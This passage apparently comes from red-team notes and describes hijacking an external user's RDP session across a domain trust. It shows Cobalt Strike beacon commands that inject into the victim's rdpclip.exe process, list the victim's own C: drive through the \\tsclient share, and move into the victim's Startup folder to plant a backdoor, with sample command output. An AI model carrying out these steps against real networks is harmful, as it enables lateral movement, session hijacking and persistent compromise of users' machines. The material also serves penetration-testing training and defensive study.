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If the **external group** has **RDP access** to any **computer** in the current domain, an **attacker** could **compromise that computer and wait for him**.
Once that user has accessed via RDP, the **attacker can pivot to that users session** and abuse its permissions in the external domain.
# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
If a user access via **RDP into a machine** where an **attacker** is **waiting** for him, the attacker will be able to **inject a beacon in the RDP session of the user** and if the **victim mounted his drive** when accessing via RDP, the **attacker could access it**.
In this case you could just **compromise** the **victims****original computer** by writing a **backdoor** in the **statup folder**.
# Wait til someone logs in:
net logons
Logged on users at \\localhost:
# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
4960 1012 rdpclip.exe x64 3 EXT\super.admin
beacon> inject 4960 x64 tcp-local
# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c
Size Type Last Modified Name
---- ---- ------------- ----
dir 02/10/2021 04:11:30 $Recycle.Bin
dir 02/10/2021 03:23:44 Boot
dir 02/20/2021 10:15:23 Config.Msi
dir 10/18/2016 01:59:39 Documents and Settings
# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
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